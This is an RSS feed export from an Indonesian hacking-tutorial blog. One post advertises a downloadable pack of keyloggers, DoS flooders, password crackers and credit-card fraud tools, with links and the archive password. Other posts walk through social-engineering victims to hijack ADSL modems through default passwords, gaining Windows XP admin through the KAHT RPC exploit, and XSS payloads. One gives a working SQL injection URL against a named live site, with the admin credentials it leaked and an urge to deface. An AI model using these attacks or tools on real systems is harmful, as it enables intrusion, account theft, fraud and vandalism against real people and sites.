<p>- Exploit Collection (4 Tools)<br />- Google Hacking (4 Tools)<br />- Keyloggers (5 Tools)<br />- Binder &#038; Packer (15 Tools)<br />- Flood_DOS (20 Tools)<br /><span id="more-618"></span>- Messenger (11 Tools)<br />- Bruter (9 Tools)<br />- Anonimity (1 Tool)<br />- !!! $$$ !!! (13 Tools)<br />- AIO</p>
<p><span style="font-weight: bold">Exploit Collection</span></p>
<p>1. 10377 Exploit<br />2. SMF ShoutBox Xss &#038; HTML Injection<br />3. SMF Ultimate Shoutbox Cookie Disclosure Exploit<br />4. Firefox_BuG</p>
<p><span style="font-weight: bold">Messenger</span></p>
<p>1. MSN Extreme 3.0<br />2. MSN Spy Lite v1.0<br />3. Yahoo Hack!<br />4. Hotmail Email Hacker<br />5. Hotmail Hacker Gold<br />6. HotmailHack<br />7. YahooUltraCracker<br />8. winks,moods,mugins,weemees and meegos + Installer<br />9. MSN Messenger Account Cracker v2.0<br />10. SH Yahoo Pass Sender 1.1<br />11. Yahoo Password Decoder</p>
<p><span style="font-weight: bold">Google Hacking</span></p>
<p>1. Alt GooGle<br />2. Google Version 1.2<br />3. Google H4ck3r (3 programs)<br />4. GooLink</p>
<p><span style="font-weight: bold">Keyloggers</span></p>
<p>1. Elgolf 1.0 Beta<br />2. ESK KeyLogger<br />3. Glog Keylogger<br />4. HermanAgent<br />5. IKlogger0.1</p>
<p><span style="font-weight: bold">Bbruter</span></p>
<p>1. WebCrack v4.0<br />2. Brutus<br />3. Crack FTP<br />4. FTP Brute Hacker<br />5. phpbb bruteforcer<br />6. PhpBB Pass Extractor<br />7. phpBB Cracker<br />8. Email Cracker<br />9. FTP Brute Forcer</p>
<p><span style="font-weight: bold">!!! $$$ !!!</span></p>
<p>1. Cmaster<br />2. CC Verify<br />3. CWizard<br />4. THCC<br />5. Visa Card Generator 06<br />6. Carcabot_Mass_Email<br />7. CcHack<br />8. CC-Fake<br />9. cvv2c<br />10. DesertCVV2<br />11. id-fake<br />12. Paypal-Link-Spoofed<br />13. HoW to get Credit Cards Fresh and Fastest</p>
<p><span style="font-weight: bold">AIO</span></p>
<p>1. Uploader for All<br />2. Cool Small Usefull Dp</p>
<p><span style="font-weight: bold">Flood DOS</span></p>
<p>1. Flowbabeflow<br />2. FreeSiteKiller V 2.01<br />3. Webxgrab<br />4. Web Attacker ENG<br />5. TheRapist-Dos Attacker<br />6. HybridFlood2<br />7. Ati-russ 3.0<br />8. Http Bomber v1.001b<br />9. Sprut<br />10. DoS_5<br />11. etherflood<br />12. DoSAttacker<br />13. phpBB Dos<br />14. phpBB Attacker<br />15. Ping Attack<br />16. Site Nuke<br />17. Divine Intervention<br />18. UC Forum Spammer<br />19. Inferno Nuker<br />20. Multiple Site Flood</p>
<p><font size="4" style="color: #33ff33"><span style="font-weight: bold; background-color: #000000">Silahkan di download di :</span><span style="font-weight: bold; background-color: #000000"> Updated Links !!! Hacking tools 2007</span></font></p>
<p><a target="_blank" href="http://rapidshare.com/files/85433778/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part1.rar" target="_self">http://rapidshare.com/files/85433778/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part1.rar</a><br /><a target="_blank" href="http://rapidshare.com/files/85426770/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part2.rar" target="_self">http://rapidshare.com/files/85426770/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part2.rar</a></p>
<p>Pass : XxxPass_DJ_haselking<br /> Pass :-XxxPass_DJ_haselking</p>
<p><span style="font-weight: bold">Hack</span> &#8230; <span style="font-weight: bold">hack</span> &#8230; <span style="font-weight: bold">hack</span> the World !! <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="CD Hacking Tools 2007   Gratis tutorial hacking web desain grafis" />  <br />( Just for lamerz )</p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/cd-hacking-tools-2007-gratis/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Hacking Modem Speedy dan Penanganannya</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/hacking-modem-speedy-dan-penanganannya</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/hacking-modem-speedy-dan-penanganannya#comments</comments>
		<pubDate>Thu, 11 Jun 2009 10:21:21 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya. Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default [...]]]></description>
			<content:encoded><![CDATA[ <p><img class="caption" src="http://i12.tinypic.com/4xxlcgj.jpg" border="0" width="135" height="178" align="left" title="Hacking Modem Speedy dan Penanganannya tutorial hacking web desain grafis" alt="Hacking Modem Speedy dan Penanganannya tutorial hacking web desain grafis" />Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Hacking Modem Speedy dan Penanganannya tutorial hacking web desain grafis" />  </p>
<p>Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default. </p>
<p>Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan : </p>
<p> <span id="more-617"></span>
<p>&nbsp;</p>
<p>Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )</p>
<p>Website dengan log system flat file ( diambil dari artikelnya Anggi J. )</p>
<p>Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )</p>
<p>Internet Password Asterisk Reveal </p>
<p>( <a target="_blank" href="http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe">http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe</a> )</p>
<p>&nbsp;</p>
<p>Langkah Pertama</p>
<p>Silahkan anda baca artikel <a href="http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/">http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/</a><br />, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.</p>
<p>&nbsp;</p>
<p>Langkah Ke Dua</p>
<p>Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :</p>
<p>&nbsp;</p>
<p>Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???</p>
<p>Sang_korban : apaan tuh ?</p>
<p>Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.</p>
<p>Sang_korban : coba, gw liat dulu. # kena!! </p>
<p>Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U </p>
<p>&nbsp;</p>
<p>Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file. </p>
<p>Contoh IP yang sudah dilog dalam flat file, </p>
<p>&nbsp;</p>
<p>Waktu: Fri, 06 Jul 2007 12:47:04 +0700 | IP asli: 125.161.2.85 | Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)  | URL: / | Referrer: | Proxy:  | Koneksi:</p>
<p>&nbsp;</p>
<p>Langkah Ketiga</p>
<p>Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah <a target="_blank" href="http://125.160/">http://125.160</a>.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal. </p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>Penanganan</p>
<p>Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te &#8211;&gt; bentuk lain dari ilmuwebsite</p>
<p>&nbsp;</p>
<p>Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.</p>
<p>Default password untuk setiap modem :</p>
<p><a target="_blank" href="http://www.elitehackers.info/defaultpasslist.php">http://www.elitehackers.info/defaultpasslist.php</a></p>
<p>// Greetz :</p>
<p>&nbsp;</p>
<p>Special for mylovely, terima kasih infonya, ide-nya jadi makin bertambah.</p>
<p>Bscorpio, phii, dan ryuzaki, ninjaring, barudak STTTelematika Ciawi Bogor. </p>
<p>Fel_c, Mentari^, Abang Dennis the Manace</p>
<p>Allguys Echo Member, #khilafah, pepei dwipangga dan konco-konconya di liberationyouth.com, anak-anak saveusgue</p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/hacking-modem-speedy-dan-penanganannya/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Tekhnik Exploit Password WinXP</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/tekhnik-exploit-password-winxp</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/tekhnik-exploit-password-winxp#comments</comments>
		<pubDate>Thu, 11 Jun 2009 10:19:33 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue &#8230; ) dan batch file [...]]]></description>
			<content:encoded><![CDATA[ <p><img src="http://www.depts.ttu.edu/peWeb/images/computing/password_popup.jpg" border="0" width="210" height="186" align="left" title="Tekhnik Exploit Password WinXP tutorial hacking web desain grafis" alt="Tekhnik Exploit Password WinXP tutorial hacking web desain grafis" />Kali ini saya akan mencoba    untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan    SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya    adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang    Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue    &#8230; ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal    <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Tekhnik Exploit Password WinXP tutorial hacking web desain grafis" /> , sedangkan kali ini yang saya bahas adalah jenis NTFS, <span id="more-616"></span>yang tidak memiliki    acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya    sang Admin tersayang, sehingga apabila dipaksakan “Access Denied”    adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas    ?, yang jelas mah sama-sama buat orang seneng&#8230; heuheueehuhuehuee ! Jawab sendiri    dah &#8230;
<p>Tekhnik pertama : <br />   Yang kita butuhkan sekarang adalah : <br />   Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html    sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang    bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu    versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat    , rawrite2.exe .<br />   1 buah disket kosong dan layak pakai. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Tekhnik Exploit Password WinXP tutorial hacking web desain grafis" />  &#8211;&gt; untuk disket boot Petter Recovery    Password.<br />   Nekatzzzz &#8230;. </p>
<p>Kasusnya begini, misalnya &#8230;.anggap saja kita lupa password untuk login winXP    nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang &#8230; hehehe.    Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo    dijual &#8230; huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu.    Langsung aja deuh &#8230; </p>
<p>Langkah pertama &#8230; Setelah Petter Recovery Password di jadikan bootdisk, langsung    saja booting dengan disket tersebut &#8230; <br />   Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan    enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi,    di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file    berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah    itu &#8230;&#8230;. Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus    passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini    kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu    nantinya &#8230;. hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat    password Administrators menjadi blankpassword [* = blankpassword], supaya gampang    nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter    Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti    password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? &#8230; siiiip,    tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts    tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak.    Lebih baik tidak lahhhh &#8230; Edit Completed. Catatan : Setelah menggunakan Petter    Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru    di acak-acak nie : ). Tunggu hingga proses scandisk selesai. <br />   Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti    biasanya. ( Nggak menarik, hehehehe&#8230; ) Sekarang tekan ctrl+alt+del, tunggu    sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang    clasic, seperti di windows 98 dulu. Dengan 2 textbox&#8230; </p>
<p><span style="font-family: Courier New,Courier,mono; font-weight: bold">   &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</span><br /><span style="font-family: Courier New,Courier,mono; font-weight: bold">   | Log On to Windows                         | x |</span><br /><span style="font-family: Courier New,Courier,mono; font-weight: bold">   &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</span><br /><span style="font-family: Courier New,Courier,mono; font-weight: bold">   | User Name : Al-k                              | </span><br /><span style="font-family: Courier New,Courier,mono; font-weight: bold">   | Password : ******                             |</span><br /><span style="font-family: Courier New,Courier,mono; font-weight: bold">   |                                               |</span><br /><span style="font-family: Courier New,Courier,mono; font-weight: bold">   | | Ok | | Cancel | | BLABLABLABLA&#8230;.|         |</span><br /><span style="font-family: Courier New,Courier,mono; font-weight: bold">   &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</span> </p>
<p>Ya, bentuknya kira-kira seperti diatas &#8230; : )&#8230; <br />   Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan    saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator.    Ok. Jreng-jreng-jreng&#8230; sekarang anda menjadi super user kembali. Silahkan    buat account untuk anda sendiri. </p>
<p>Tekhnik Kedua : <br />   Tiba saatnya kita maju bersama &#8230; <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Tekhnik Exploit Password WinXP tutorial hacking web desain grafis" /> , memanfaatkan Massive RPC WinXP yang bobrok.    Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat    kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta    izin dari sang Admin. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' title="Tekhnik Exploit Password WinXP tutorial hacking web desain grafis" />  . Yang dibutuhkan hanyalah acces untuk masuk ke command    shell, dan satu tool kecil ‘kaht’ . Siap ???&#8230; buka command promptnya    &#8230; </p>
<pre class="code">

C:\Documents and Settings\Al-k&gt;net user

User accounts for \\NOMATTER  -------------------------------------------------------------------------------  Administrator Al-k GNU-- keluarga --  Guest HelpAssistant SUPPORT_388945a0  VUSR_NOMATTER  The command completed successfully.

// Anggap saja disini Al-k adalah user yang limited// Setelah itu masuk ke direktori di mana kaht berada

D:\Data+ku_&gt;
</pre>
<p>Kemudian kita test dulu kaht-nya&#8230; bisa nggak nih kita nge-root.</p>
<pre class="code">  D:\Data+ku_&gt;kaht 127.0.0.0 127.0.0.3_________________________________________________

  KAHT II - MASSIVE RPC EXPLOIT  DCOM RPC exploit. Modified by aT4r@3wdesign.es  #haxorcitos &#038;&#038; #localhost @Efnet Ownz you!!!  FULL VERSION? <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Tekhnik Exploit Password WinXP tutorial hacking web desain grafis" />  - AUTOHACKING  ________________________________________________

 [+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads [+] Attacking Port: 135. Remote Shell at port: 34522 [+] Scan In Progress...  - Connecting to 127.0.0.2

  Sending Exploit to a [WinXP] Server...  - Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32&gt;

Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita buat akses user yang terbatas tadi menjadi Super User. 



C:\WINDOWS\system32&gt; net localgroup Administrators Al-k /add

  The command completed successfully.

  </pre>
<p>Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi.    Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator,    tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda    bisa masuk ke regedit untuk menutup perizinan user account pada control panel    :</p>
<p>HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/</p>
<p>, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl <br />   Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda    menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya    bisa di lakukan di Windows XP Service Pack 1. : (</p>
<p>   // Refferensi :<br />   &#8211; Seni Tekhnik Hacking 1 [S’to]<br />   &#8211; Echo Zine 10, Exploitasi Windows XP [mRt]<br />   &#8211; Iseng Instink</p>
<p> // Greetz :<br />   &#8211; y3dips, Lirva32, z3r0byte ( Arabic Man <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Tekhnik Exploit Password WinXP tutorial hacking web desain grafis" />  ), the_day, S’to [duuh masuk    TV tuk <br />   yang kesekian kalinya nih ???] . &#038; Echo staff who can’t mentioned    1 by 1.<br />   &#8211; Alumni SMAN4 Bogor &#038; All guy’s in STTTelematika Ciawi Bogor. <br />   &#8211; Special for Jheseecka &#038; Melati “Mel, ini artikel ke 1 dan ke 2-nya    !!! <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Tekhnik Exploit Password WinXP tutorial hacking web desain grafis" /> “<br />   &#8211; hg_ , Fel_c, Mentari^, the aeh, zacx, Azwa, Sita, Dulleh, Ibonx, weww, Qank-qunk,    <br />   AK47-angga, ninjaring<br />   &#8211; Allguys in #yogyafree, Echo Member, #khilafah, #pribumi, #e-c-h-o, #freebase        <!-- google_ad_section_end --></p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/tekhnik-exploit-password-winxp/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sedikit penjelasan mengenai XSS vulnerability</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/sedikit-penjelasan-mengenai-xss-vulnerability</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/sedikit-penjelasan-mengenai-xss-vulnerability#comments</comments>
		<pubDate>Thu, 11 Jun 2009 10:13:14 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Sedikit penjelasan mengenai XSS vulnerability Apaan sih XSS tuh ?Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [...]]]></description>
			<content:encoded><![CDATA[ <p><img class="caption" src="http://hackademix.net/wp-content/uploads/2008/05/paypal_xss.jpg" border="0" width="200" height="140" align="left" title="Sedikit penjelasan mengenai XSS vulnerability tutorial hacking web desain grafis" alt="Sedikit penjelasan mengenai XSS vulnerability tutorial hacking web desain grafis" />Sedikit penjelasan mengenai XSS vulnerability</p>
<p><span style="font-weight: bold">Apaan sih XSS tuh ?</span><br />Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [ XNUXER Laboratory ] ketika  melakukan pen-test situs KPU.go.id beberapa tahun lalu.<span id="more-613"></span> XSS pun bisa digunakan untuk mencuri cookies, sehingga seorang cracker bisa menggunakan identitas orang lain dengan menggunakan cookies hasil curian. XSS biasanya digunakan oleh newbie hacker yang tidak memiliki explo untuk menjalankan aksi ilegalnya. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Sedikit penjelasan mengenai XSS vulnerability tutorial hacking web desain grafis" /> </p>
<p><span style="font-weight: bold">Maksudnya apaan sih, nggak ngerti !</span><br />Singkat cerita, metode XSS dan SQL Injection digunakan untuk melakukan deface pada sebuah website. Istilah familiarnya &#8220;nge-hack website&#8221; walaupun pada kenyataannya deface itu tidak sama dengan hacking. Deface sendiri memiliki arti, merusak sebagian atau keseluruhan dari isi website. </p>
<p><span style="font-weight: bold">Caranya gimana ???</span><br />Caranya nggak susah-susah amat, anda hanya perlu menggunakan browser anda untuk memanfaatkan vuln ini. Contoh situs yang masih bisa di XSS adalah :</p>
<p>http://www.malesbanget.com/kamus/definisi.php?kata=</p>
<p>untuk mengetes apakah situsnya masih bisa di XSS anda bisa menambahkan setelah kata=</p>
<p>&lt;script&gt;alert(&#8216;Tes, XSS-nya masih bisa&#8217;)&lt;/script&gt;</p>
<p>http://www.malesbanget.com/kamus/definisi.php?kata=&lt;script&gt;alert(&#8216;Tes, XSS-nya masih bisa&#8217;)&lt;/script&gt;</p>
<p>kemudian tekan enter &#8230; <br />kemudian akan muncul popup baru berisi &#8216;Tes, XSS-nya masih bisa&#8217;</p>
<p><span style="font-weight: bold">Terus &#8230; ???</span><br />Masih banyak tag html yang bisa kita gunakan, tanya deh mamang Google. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Sedikit penjelasan mengenai XSS vulnerability tutorial hacking web desain grafis" /> </p>
<p>contoh lainnya adalah :</p>
<p>http://www.malesbanget.com/kamus/definisi.php?kata=&lt;h1&gt;Hacked by Me&lt;/h1&gt;&lt;h7&gt;</p>
<p>Cuma gitu doang ???<br />Iya&#8230; segitu dulu aja entar di lanjut lagi. Tunggu aja. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Sedikit penjelasan mengenai XSS vulnerability tutorial hacking web desain grafis" /> </p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/sedikit-penjelasan-mengenai-xss-vulnerability/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SQL Injection AJ Auction seluruh versi</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/sql-injection-aj-auction-seluruh-versi</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/sql-injection-aj-auction-seluruh-versi#comments</comments>
		<pubDate>Thu, 11 Jun 2009 10:07:53 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[SQL Injection pada Aj Auction untuk seluruh versi. Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk sebagai admin pada situs yang memiliki bug pada halaman subcat.php langsung aja buka google-nya &#8230;masukkan keyword ini inurl:/subcat.php?cate_id= nah loh, dapet banyak bangett &#8230; pilih aja salah satunya contoh : http://www.estoop.it/subcat.php?cate_id=146&#038;view=list&#038;PHPSESSID=27c9b2b6500f2c01c09eda1978d45096 setelah cate_id= di hapus aja [...]]]></description>
			<content:encoded><![CDATA[ <p><img class="caption" src="http://www.trustit.ca/images/products/security/sql-injection.jpg" border="0" width="210" height="186" align="left" title="SQL Injection AJ Auction seluruh versi tutorial hacking web desain grafis" alt="SQL Injection AJ Auction seluruh versi tutorial hacking web desain grafis" />SQL Injection pada Aj Auction untuk seluruh versi.</p>
<p>Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk <br />sebagai admin pada situs yang memiliki bug pada halaman subcat.php</p>
<p>langsung aja buka google-nya &#8230;<br />masukkan keyword ini inurl:/subcat.php?cate_id= </p>
<p><span id="more-611"></span>
<p>nah loh, dapet banyak bangett &#8230; <br />pilih aja salah satunya contoh :</p>
<p>http://www.estoop.it/subcat.php?cate_id=146&#038;view=list&#038;PHPSESSID=27c9b2b6500f2c01c09eda1978d45096</p>
<p>setelah cate_id= di hapus aja kemudian di ganti dengan </p>
<p>-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas</p>
<p>sword),2%20from%20admin/*&#038;view=list</p>
<p>kira kira jadi begini </p>
<p>http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11</p>
<p>7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&#038;view=list</p>
<p>nah loh passwordnya langsung dapet </p>
<p>turkey:adminturkeypass:daniel87</p>
<p>itu artinya <br />usernamenya admin <br />passwordnya daniel87</p>
<p>sekarang masuk ke control panelnya </p>
<p>http://www.estoop.it/admin<br />terus masukkin username dan passwordnya </p>
<p>jreng jreng jreng anda di bawa ke control panel &#8230;</p>
<p>hehehehe &#8230; deface deface &#8230;</p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/sql-injection-aj-auction-seluruh-versi/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Jadi root di linux tanpa password</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/jadi-root-di-linux-tanpa-password</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/jadi-root-di-linux-tanpa-password#comments</comments>
		<pubDate>Thu, 11 Jun 2009 09:59:06 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Boot Linux tanpa Password Melalui mode single pada GRUB       Hi, ketemu lagi dengan saya, sikeren Al-k.     Sama seperti sebelum sebelumnya, yaitu artikel mengenai jebol password,     tapi kali ini saya akan menjelaskannya pada Linux.     Mungkin pada artikel yang lain telah di jelaskan bagaimana     cara melakukan login tanpa password dengan bootloader [...]]]></description>
			<content:encoded><![CDATA[ <p><img class="caption" src="http://www.yolinux.com/TUTORIALS/images/tux-wicked-2ty.gif" border="0" width="210" height="250" align="left" title="Jadi root di linux tanpa password tutorial hacking web desain grafis" alt="Jadi root di linux tanpa password tutorial hacking web desain grafis" /><span style="font-weight: bold">Boot Linux tanpa Password </span><br /><span style="font-weight: bold">Melalui mode single pada GRUB  </span></p>
